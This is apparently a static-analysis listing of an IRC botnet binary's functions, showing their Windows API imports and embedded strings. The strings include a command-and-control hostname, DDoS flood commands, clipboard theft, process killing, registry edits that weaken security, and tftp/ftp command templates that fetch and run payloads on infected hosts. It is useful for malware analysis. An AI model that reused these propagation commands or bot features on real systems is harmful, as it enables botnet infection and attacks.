sub_outside():
KERNEL32.GetTickCount
KERNEL32.GetComputerNameA
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
KERNEL32.SetUnhandledExceptionFilter
|
sub_403913(019e):
"%sKB"
"failed"
|
sub_40530E(03c8):
NTDLL.RtlGetLastWin32Error
KERNEL32.FormatMessageA
"%s Error: %s <%d>."
|
sub_4138B8(06bc):
KERNEL32.GetCPInfo
|
sub_40EB84(0828):
KERNEL32.GetVersion
KERNEL32.GetCommandLineA
KERNEL32.GetStartupInfoA
KERNEL32.GetModuleHandleA
|
sub_40322D(09b3):
KERNEL32.Sleep
|
sub_410223(0a41):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_40B359(0c04):
KERNEL32.ExitThread
|
sub_416004(0e35):
KERNEL32.LoadLibraryA
KERNEL32.GetProcAddress
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_40601E(1889):
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
KERNEL32.CloseHandle
|
sub_414034(18d1):
KERNEL32.GetModuleFileNameA
"C:\\m_unpacker\\packed.exe"
|
sub_406D25(1e6a):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
KERNEL32.GetLogicalDrives
KERNEL32.GetDriveTypeA
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
|
sub_40C19D(1fc3):
KERNEL32.TerminateThread
WS2_32.closesocket
|
sub_4045F0(2015):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.GetDiskFreeSpaceExA
NTDLL.RtlGetLastWin32Error
KERNEL32.LoadLibraryA
WININET.InternetOpenA
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
|
sub_401412(22a3):
"%d.%d.%d.%d"
|
sub_412AE8(22de):
NTDLL.RtlSizeHeap
|
sub_403E11(2484):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"220 StnyFtpd 0wns j0\n"
"%s %s"
"USER"
"331 Password required\n"
"PASS"
"230 User logged in.\n"
"SYST"
"215 StnyFtpd\n"
"REST"
"350 Restarting.\n"
"257 \"/\" is current directory.\n"
"TYPE"
"A"
"200 Type set to A.\n"
"TYPE"
"I"
"200 Type set to I.\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200 PORT command successful.\n"
"RETR"
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye happy r00ting.\n"
|
sub_403CA3(24da):
WS2_32.inet_addr
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
|
sub_4010CA(28ed):
WS2_32.inet_ntoa
|
sub_405F40(2a9a):
KERNEL32.ExitThread
|
sub_413D9F(2f2e):
KERNEL32.UnhandledExceptionFilter
|
sub_415A78(33c3):
KERNEL32.GetTimeZoneInformation
KERNEL32.WideCharToMultiByte
"TZ"
|
sub_415753(386a):
KERNEL32.FlushFileBuffers
NTDLL.RtlGetLastWin32Error
|
sub_4013CA(3b1d):
WS2_32.htonl
|
sub_40551B(3cc3):
KERNEL32.GetTempPathA
KERNEL32.CreateFileA
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
KERNEL32.ExpandEnvironmentStringsA
KERNEL32.CreateProcessA
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
"%%comspec%% /c %s %s"
|
sub_405455(3f4b):
KERNEL32.SearchPathA
KERNEL32.CreateFileA
KERNEL32.GetFileTime
KERNEL32.CloseHandle
KERNEL32.SetFileTime
"explorer.exe"
|
sub_40E2E2(3fca):
KERNEL32.GetLocalTime
KERNEL32.GetSystemTime
KERNEL32.GetTimeZoneInformation
|
sub_4063A4(3fdf):
WS2_32.recv
WS2_32.send
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_4043F8(4036):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_402E09(443a):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"tftp -i %s get %s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_4100DB(45c9):
KERNEL32.GetVersionExA
KERNEL32.GetEnvironmentVariableA
KERNEL32.GetModuleFileNameA
"__MSVCRT_HEAP_SELECT"
"__GLOBAL_HEAP_SELECTED"
|
sub_411D85(4634):
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_41569C(4712):
KERNEL32.SetStdHandle
|
sub_40B807(4977):
KERNEL32.GetVersionExA
ADVAPI32.GetUserNameA
WS2_32.inet_addr
WS2_32.gethostbyaddr
KERNEL32.GetSystemDirectoryA
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
KERNEL32.GlobalMemoryStatus
"2003"
"%s (%s)"
"couldn't resolve host"
"dd:MMM:yyyy"
"HH:mm:ss"
"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
|
sub_4067E1(4bfa):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.inet_ntoa
WS2_32.closesocket
|
sub_411EAC(502f):
"e+000"
|
sub_415625(545a):
KERNEL32.SetStdHandle
|
sub_413455(547a):
KERNEL32.LCMapStringW
KERNEL32.LCMapStringA
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_4100AE(5645):
KERNEL32.GetModuleHandleA
|
sub_40B751(5868):
KERNEL32.Sleep
|
sub_407681(58c6):
WS2_32.send
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.recv
"PASS %s\r\n"
|
sub_4110BF(58ed):
KERNEL32.VirtualAlloc
|
sub_412E82(5a90):
KERNEL32.ReadFile
NTDLL.RtlGetLastWin32Error
|
sub_4038CB(5b85):
KERNEL32.GetDiskFreeSpaceExA
|
sub_4022FD(5f99):
WS2_32.send
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_40DB08(6050):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_413BAD(6091):
KERNEL32.SetFilePointer
NTDLL.RtlGetLastWin32Error
|
sub_4057D9(62ac):
WS2_32.inet_addr
WS2_32.gethostbyname
|
sub_416808(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_40752C(63b2):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
|
sub_4109D6(64eb):
KERNEL32.VirtualAlloc
|
sub_401704(64f6):
WS2_32.inet_addr
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
WS2_32.inet_ntoa
KERNEL32.ExitThread
|
sub_414A9C(66df):
KERNEL32.WideCharToMultiByte
|
sub_40CD81(6c37):
NTDLL.RtlFreeHeap
|
sub_405D93(6efa):
KERNEL32.CreateToolhelp32Snapshot
KERNEL32.Process32First
KERNEL32.CloseHandle
KERNEL32.Module32First
KERNEL32.Process32Next
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
"SeDebugPrivilege"
"SeDebugPrivilege"
" %s (%d)"
|
sub_40CD0D(7566):
NTDLL.RtlAllocateHeap
|
sub_40649F(7e76):
KERNEL32.GetTickCount
|
sub_4030CD(7f68):
"-[Alias List]-"
"%d. %s = %s"
|
sub_401141(80ba):
KERNEL32.GetModuleFileNameA
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
|
sub_41718F(8107):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
|
sub_415447(81be):
KERNEL32.GetStringTypeW
KERNEL32.GetStringTypeA
KERNEL32.MultiByteToWideChar
|
sub_41794C(822d):
"invalid string position"
|
sub_417720(822d):
"string too long"
|
sub_412BBE(84ec):
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_410280(8555):
NTDLL.RtlAllocateHeap
|
sub_40C2EA(8732):
"%s: %s stopped. (%d thread(s) stopped.)"...
"%s: No %s thread found."
|
sub_4014AE(8768):
WS2_32.socket
WS2_32.htons
WS2_32.ioctlsocket
WS2_32.connect
WS2_32.select
WS2_32.closesocket
|
sub_4102F3(87ad):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_40699F(8931):
KERNEL32.ExitThread
|
sub_40D2E8(8af0):
NTDLL.RtlUnwind
|
sub_415418(8bd2):
KERNEL32.IsBadCodePtr
|
sub_4031BC(8c91):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey
"Microsofts Systems Services"
|
sub_4056A3(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_4157AA(8dd2):
KERNEL32.CreateFileA
KERNEL32.GetFileType
KERNEL32.CloseHandle
NTDLL.RtlGetLastWin32Error
|
sub_405398(8e50):
USER32.OpenClipboard
USER32.GetClipboardData
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
USER32.CloseClipboard
|
sub_40B3F5(9056):
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
KERNEL32.QueryPerformanceFrequency
KERNEL32.QueryPerformanceCounter
WS2_32.htonl
WS2_32.sendto
WS2_32.closesocket
WS2_32.WSACleanup
WS2_32.WSAGetLastError
|
sub_40DE14(91cb):
KERNEL32.GetFileAttributesA
NTDLL.RtlGetLastWin32Error
|
sub_4147CC(94b9):
KERNEL32.WriteFile
NTDLL.RtlGetLastWin32Error
|
sub_401BC7(94d6):
"BBBB"
"CCCC"
|
sub_405985(953e):
IPHLPAPI.IcmpCreateFile
WS2_32.inet_addr
WS2_32.gethostbyname
KERNEL32.ExitThread
IPHLPAPI.IcmpSendEcho
IPHLPAPI.IcmpCloseHandle
"[PING]: Error sending pings to %s."
"[PING]: Finished sending pings to %s."
|
sub_401F9C(981b):
WS2_32.htonl
WS2_32.send
|
sub_414B04(9a80):
KERNEL32.MultiByteToWideChar
|
sub_406055(9bdf):
WS2_32.htons
WS2_32.socket
WS2_32.WSAAsyncSelect
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_40C11F(9c71):
"-[Thread List]-"
"%d. %s"
|
sub_4054F9(9dbe):
USER32.ExitWindowsEx
"SeShutdownPrivilege"
|
sub_405B11(9dd3):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.inet_addr
WS2_32.gethostbyname
KERNEL32.ExitThread
WS2_32.htons
WS2_32.sendto
KERNEL32.Sleep
|
sub_4153E0(9ed0):
KERNEL32.IsBadReadPtr
|
sub_4153FC(9ed0):
KERNEL32.IsBadWritePtr
|
sub_4020C0(a2f7):
WS2_32.send
|
sub_401000(a6b1):
" %s: %d,"
" Total: %d in %s."
|
sub_413679(a8e4):
KERNEL32.GetOEMCP
KERNEL32.GetCPInfo
|
sub_406441(ac14):
KERNEL32.GetTickCount
"Ww|"
"%s"
|
sub_417B7B(aeff):
KERNEL32.RaiseException
|
sub_40EC9F(af5c):
KERNEL32.ExitProcess
|
sub_405775(afa1):
KERNEL32.MultiByteToWideChar
|
sub_403882(b2db):
KERNEL32.GetDriveTypeA
"RAM"
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_40154B(b314):
KERNEL32.GetTickCount
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
WS2_32.inet_ntoa
KERNEL32.Sleep
KERNEL32.ExitThread
|
sub_40EA57(b873):
KERNEL32.DeleteFileA
NTDLL.RtlGetLastWin32Error
|
sub_4061D2(ba3e):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.gethostbyaddr
WS2_32.connect
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.recv
WS2_32.send
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_4068AE(baf2):
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
KERNEL32.CloseHandle
WS2_32.htonl
|
sub_405D28(bbe1):
KERNEL32.GetCurrentProcess
ADVAPI32.OpenProcessToken
ADVAPI32.LookupPrivilegeValueA
ADVAPI32.AdjustTokenPrivileges
KERNEL32.CloseHandle
|
sub_4053D3(c66c):
USER32.FindWindowA
KERNEL32.CreateFileMappingA
KERNEL32.MapViewOfFile
USER32.SendMessageA
KERNEL32.UnmapViewOfFile
KERNEL32.CloseHandle
"mIRC"
|
sub_40450F(c85a):
WS2_32.send
|
sub_4143B3(c890):
KERNEL32.GetStartupInfoA
KERNEL32.GetFileType
KERNEL32.GetStdHandle
KERNEL32.LockResource
|
sub_4032EE(c9ee):
WININET.InternetOpenUrlA
KERNEL32.CreateFileA
KERNEL32.ExitThread
KERNEL32.GetTickCount
WININET.InternetReadFile
KERNEL32.WriteFile
KERNEL32.CloseHandle
KERNEL32.CreateProcessA
WS2_32.WSACleanup
KERNEL32.ExitProcess
WININET.InternetCloseHandle
"open"
|
sub_40BB81(cb2e):
WS2_32.socket
KERNEL32.Sleep
WS2_32.WSAGetLastError
KERNEL32.ExitThread
WS2_32.htons
WS2_32.bind
WS2_32.select
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.sendto
WS2_32.closesocket
"octet"
|
sub_403B83(cb3a):
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.Sleep
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleFileNameA
KERNEL32.CreateProcessA
KERNEL32.CloseHandle
KERNEL32.ExitProcess
|
sub_40D044(cba9):
NTDLL.RtlUnwind
|
sub_410925(cbe8):
NTDLL.RtlReAllocateHeap
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
NTDLL.RtlFreeHeap
|
sub_4066DA(cd8b):
KERNEL32.GetTickCount
USER32.FindWindowA
"mIRC"
|
sub_404555(d0e3):
WS2_32.send
KERNEL32.Sleep
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
|
sub_41157F(d2f6):
KERNEL32.RaiseException
|
sub_4077FD(d322):
KERNEL32.GetTickCount
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
WS2_32.getsockname
WS2_32.inet_ntoa
WS2_32.inet_addr
KERNEL32.MoveFileA
KERNEL32.CreateProcessA
KERNEL32.GetTempPathA
KERNEL32.DeleteFileA
WS2_32.gethostbyaddr
WS2_32.gethostbyname
KERNEL32.GetModuleFileNameA
DNSAPI.DnsFlushResolverCache
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.ExitProcess
" :"
" "
"!"
"PING"
"PONG %s\r\n"
"JOIN %s %s\r\n"
"001"
"005"
"302"
"@"
"433"
"NICK %s\r\n"
"KICK"
"NOTICE %s :%s\r\n"
"JOIN %s %s\r\n"
"NICK"
":%s%s"
"PART"
"QUIT"
"353"
"PART"
"NOTICE %s :%s\r\n"
"PRIVMSG"
"NOTICE"
" :"
"$%d-"
"$%d"
"$me"
"$user"
"$chan"
"$rndnick"
"$server"
"$chr("
")"
"63"
" "
"rndnick"
"rn"
"die"
"de"
"logout"
"lo"
"versionw"
"verw"
"secure"
"sec"
"unsecure"
"unsec"
"logstop"
"Log list"
"LOG "
"redirectstop"
"TCP redirect"
"REDIRECT "
"synstop"
"Syn flood"
"SYN "
"udpstop"
"UDP flood"
"UDP "
"pingstop"
"Ping flood"
"PING "
"tftpstop"
"Server"
"TFTP "
"procsstop"
"psstop"
"securestop"
"Secure"
"SECURE "
"scanstop"
"process"
"Rooting"
"scanstats"
"stats"
"reconnect"
"r"
"disconnect"
"d"
"quit"
"q"
"status"
"s"
"idw"
"idw"
"reboot"
"threads"
"t"
"aliases"
"al"
"netinfo"
"ni"
"sysinfo"
"si"
"rrmm010kt"
"rrmm010kt"
"procs"
"ps"
"uptime"
"up"
"driveinfo"
"drv"
"who"
"-[Login List]-"
""
"%d. %s"
"getclip"
"gc"
"flusharp"
"farp"
"flushdns"
"fdns"
"currentip"
"cip"
"tftpserver"
"tftp"
"alls"
"alls"
"nick"
"n"
"join"
"j"
"part"
"pt"
"raw"
"r"
"killthread"
"k"
"prefixw"
"prw"
"open"
"o"
"serverw"
"sew"
"dns"
"dn"
"killproc"
"kp"
"kill"
"ki"
"delete"
"del"
"mirccmd"
"mirc"
"readfile"
"rf"
"gethost"
"gh"
"addalias"
"aa"
"privmsg"
"pm"
"action"
"a"
"cycle"
"cy"
"mode"
"m"
"repeat"
"rp"
"delay"
"de"
"kkttupw"
"kkttupw"
"execute"
"e"
"rename"
"mv"
"synflood"
"syn"
"kktt"
"kktt"
"redirect"
"rd"
"portscan"
"psc"
"ass"
"aas"
"udpflood"
"udp"
"u"
"pingflood"
"ping"
"p"
"upload"
"%s\\%i%i%i.dll"
"ab"
"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
"-s:%s"
"ftp.exe"
"open"
"[PING]: Sending %d pings to %s. packet "...
"[PING]: Failed to start flood thread, e"...
"ICMP.dll not available"
"#prv##"
"Random"
"Sequential"
"KTS-Final"
"%s%s.exe"
"repeat"
"JOIN %s %s\r\n"
"r"
"open"
"all"
"NICK %s\r\n"
"#prv##"
"#prv##"
"Random"
"Sequential"
"[FLUSHDNS]: DNS cache flushed."
"[FLUSHDNS]: Failed to flush DNS cache."
"[FLUSHDNS]: Failed to load dnsapi.dll."
"[FLUSHDNS]: ARP cache flushed."
"[FLUSHDNS]: Failed to flush ARP cache."
"full"
"KTS-Final"
"QUIT :%s\r\n"
"QUIT :later\r\n"
"QUIT :disconnecting\r\n"
"QUIT :reconnecting\r\n"
"Process list"
"PROC "
"secure"
"sec"
"Unsecuring"
"Hum"
"NICK %s\r\n"
"!"
"~"
"sock"
"NOTICE %s :FAILED (%s!%s).\r\n"
"NOTICE %s :FAILED.\r\n"
"NOTICE %s :FAILED (%s!%s).\r\n"
"NOTICE %s :FAILED.\r\n"
"sock"
"USERHOST %s\r\n"
"+xi"
"MODE %s %s\r\n"
"JOIN %s %s\r\n"
|
sub_401F1D(d5f8):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
|
sub_4069FF(d7a4):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
|
sub_416C0D(db0a):
KERNEL32.SetEndOfFile
NTDLL.RtlGetLastWin32Error
|
sub_414281(dcdc):
KERNEL32.GetEnvironmentStringsW
KERNEL32.GetEnvironmentStrings
KERNEL32.WideCharToMultiByte
KERNEL32.FreeEnvironmentStringsW
KERNEL32.FreeEnvironmentStringsA
|
sub_410DC7(df93):
NTDLL.RtlAllocateHeap
KERNEL32.VirtualAlloc
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_4058DC(e076):
WS2_32.getsockname
"%d.%d.%d.%d"
|
sub_403B00(e0b0):
KERNEL32.GetLogicalDriveStringsA
"A:\\"
|
sub_405811(e2ea):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
"[FLUSHDNS]: Error getting ARP cache: <%"...
"[FLUSHDNS]: ARP cache is empty."
"[FLUSHDNS]: Unable to allocation ARP ca"...
"[FLUSHDNS]: Not supported by this syste"...
|
sub_4023B8(e2ee):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.connect
WS2_32.closesocket
KERNEL32.Sleep
"cmd /c echo open %s %d > o&echo user 1 "...
|
sub_417437(e51d):
KERNEL32.SetEnvironmentVariableA
|
sub_40B6FE(e5dd):
KERNEL32.GetTickCount
"%dd %dh %dm"
|
sub_40E7D4(e781):
KERNEL32.GetCurrentProcess
KERNEL32.TerminateProcess
KERNEL32.ExitProcess
|
sub_404475(e968):
KERNEL32.GetModuleFileNameA
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_410F0B(ea79):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_403145(edda):
KERNEL32.GetLocalTime
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_41608D(ef2b):
NTDLL.RtlAllocateHeap
|
sub_402972(f132):
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.setsockopt
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep
""
|
sub_40C0CD(f21d):
KERNEL32.ExitThread
|
sub_40BABB(f47d):
WININET.InternetGetConnectedStateEx
"[NETINFO]: [Type]: %s (%s). [IP Address"...
|
sub_403A2E(f5ac):
"failed"
|
sub_407041(fb0e):
KERNEL32.GetTickCount
KERNEL32.SetErrorMode
KERNEL32.CreateMutexA
KERNEL32.WaitForSingleObject
KERNEL32.ExitProcess
WS2_32.WSAStartup
KERNEL32.GetSystemDirectoryA
KERNEL32.GetModuleHandleA
KERNEL32.GetModuleFileNameA
KERNEL32.GetFileAttributesA
KERNEL32.SetFileAttributesA
NTDLL.RtlGetLastWin32Error
KERNEL32.Sleep
KERNEL32.CopyFileA
KERNEL32.GetCurrentProcessId
KERNEL32.OpenProcess
KERNEL32.CreateProcessA
KERNEL32.CloseHandle
WS2_32.WSACleanup
KERNEL32.DeleteFileA
KERNEL32.CreateThread
WININET.InternetGetConnectedState
"KTS-Final"
"%s%s"
"%s\\%s"
"%s %d \"%s\""
"prv.blackroz.com"
"#prv#"
"pr.."
"prv.blackroz.com"
"#prv#"
"pr.."
"#prv#"
"pr.."
|
sub_414679(fc50):
KERNEL32.GetModuleFileNameA
KERNEL32.GetStdHandle
KERNEL32.WriteFile
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_417121(fe6c):
KERNEL32.WideCharToMultiByte
|
sub_410F61(ffe7):
KERNEL32.VirtualFree
|